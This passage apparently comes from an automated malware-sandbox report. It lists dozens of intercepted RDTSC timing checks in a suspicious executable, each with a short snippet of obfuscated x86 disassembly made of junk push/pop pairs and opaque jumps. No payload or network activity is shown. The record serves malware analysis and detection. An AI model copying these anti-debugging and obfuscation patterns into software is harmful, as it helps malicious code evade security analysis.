Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9337BD second address: 9337C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9337C2 second address: 9337D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F28C47EE2BFh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9337D8 second address: 933817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnl 00007F28C4758091h 0x0000000e push eax 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F28C475807Eh 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 933817 second address: 93381D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 933E06 second address: 933E0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 939033 second address: 939039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E849 second address: 93E86F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F28C4758090h 0x00000008 jmp 00007F28C4758084h 0x0000000d je 00007F28C4758076h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E86F second address: 93E875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E875 second address: 93E879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E879 second address: 93E88B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F28C47EE2B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9A8 second address: 93E9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9B2 second address: 93E9B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9B8 second address: 93E9BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9BD second address: 93E9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9CE second address: 93E9D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9D4 second address: 93E9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93F109 second address: 93F12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758081h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 jo 00007F28C475807Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9410C7 second address: 9410CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9412DC second address: 9412E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9412E0 second address: 9412F2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F28C47EE2B6h 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9412F2 second address: 9412F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 941BA4 second address: 941BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 941BA9 second address: 941BAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 941BAE second address: 941BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jne 00007F28C47EE2B6h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 941BC3 second address: 941BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 942124 second address: 94212E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 942644 second address: 942660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F28C4758076h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jnp 00007F28C4758078h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 942660 second address: 942664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 942664 second address: 9426D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F28C4758078h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+122D27EBh], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F28C4758078h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 xor dword ptr [ebp+122D2283h], ebx 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e push esi 0x0000004f jnc 00007F28C4758076h 0x00000055 pop esi 0x00000056 jg 00007F28C475807Ch 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9426D2 second address: 9426D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94304C second address: 943050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 943050 second address: 943071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F28C47EE2B6h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 944036 second address: 94403B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94403B second address: 944041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 944BD7 second address: 944BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 944BDC second address: 944BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 946A65 second address: 946A74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9474FA second address: 94750B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007F28C47EE2BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9475B4 second address: 9475C6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9475C6 second address: 9475CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94A635 second address: 94A63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94A63E second address: 94A642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94A642 second address: 94A646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94CB56 second address: 94CB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9437FE second address: 943804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951A0A second address: 951A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951A0E second address: 951A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951A14 second address: 951A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F28C47EE2BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951A27 second address: 951A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951A2B second address: 951A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 952C39 second address: 952C4B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 952C4B second address: 952C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94491E second address: 944927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 944927 second address: 94492B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9579E5 second address: 9579EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 957A76 second address: 957A80 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9598E0 second address: 959950 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007F28C4758076h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007F28C4758081h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F28C4758078h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 and ebx, dword ptr [ebp+122D3A64h] 0x00000036 mov ebx, eax 0x00000038 push 00000000h 0x0000003a or dword ptr [ebp+122D2F41h], ebx 0x00000040 pushad 0x00000041 push edx 0x00000042 jnc 00007F28C4758076h 0x00000048 pop edi 0x00000049 xor dword ptr [ebp+122D3468h], edi 0x0000004f popad 0x00000050 xchg eax, esi 0x00000051 js 00007F28C4758084h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9453F3 second address: 9453F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 945E1E second address: 945E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F28C475807Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9467FB second address: 946801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 946801 second address: 946805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94723A second address: 947244 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F28C47EE2BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94ADFC second address: 94AE02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94AE02 second address: 94AE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94CC87 second address: 94CC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94CC8B second address: 94CCBB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F28C47EE2BDh 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F28C47EE2C1h 0x0000001c rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94EC40 second address: 94EC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 950BA8 second address: 950BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951C60 second address: 951D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnl 00007F28C4758082h 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D20FAh], esi 0x00000018 push dword ptr fs:[00000000h] 0x0000001f add bh, 00000000h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F28C4758078h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov dword ptr [ebp+124568C3h], eax 0x00000049 mov ebx, dword ptr [ebp+122D1C88h] 0x0000004f mov eax, dword ptr [ebp+122D0FFDh] 0x00000055 mov ebx, dword ptr [ebp+122D32CCh] 0x0000005b push FFFFFFFFh 0x0000005d jne 00007F28C4758082h 0x00000063 mov ebx, esi 0x00000065 nop 0x00000066 jo 00007F28C4758084h 0x0000006c pushad 0x0000006d jne 00007F28C4758076h 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951D00 second address: 951D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jl 00007F28C47EE2C8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951D10 second address: 951D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951D14 second address: 951D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 952D9D second address: 952DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 8F5FD4 second address: 8F5FEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9613CE second address: 9613D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 961528 second address: 961532 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 961532 second address: 961538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96166D second address: 961671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 961671 second address: 961684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F28C4758076h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966AA7 second address: 966AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966AAB second address: 966AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966AB1 second address: 966ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966CB1 second address: 966CB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966CB5 second address: 966CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966CBB second address: 966CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966CC1 second address: 966CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 952DA1 second address: 952DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 952DA7 second address: 952DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E5B1 second address: 96E5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F28C4758087h 0x0000000b popad 0x0000000c jnl 00007F28C475807Ch 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E5DB second address: 96E5E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96D86A second address: 96D870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96D870 second address: 96D87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F28C47EE2B6h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96D9D9 second address: 96DA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnl 00007F28C4758076h 0x00000011 jmp 00007F28C475807Bh 0x00000016 jmp 00007F28C4758081h 0x0000001b popad 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ecx 0x00000020 rdtsc
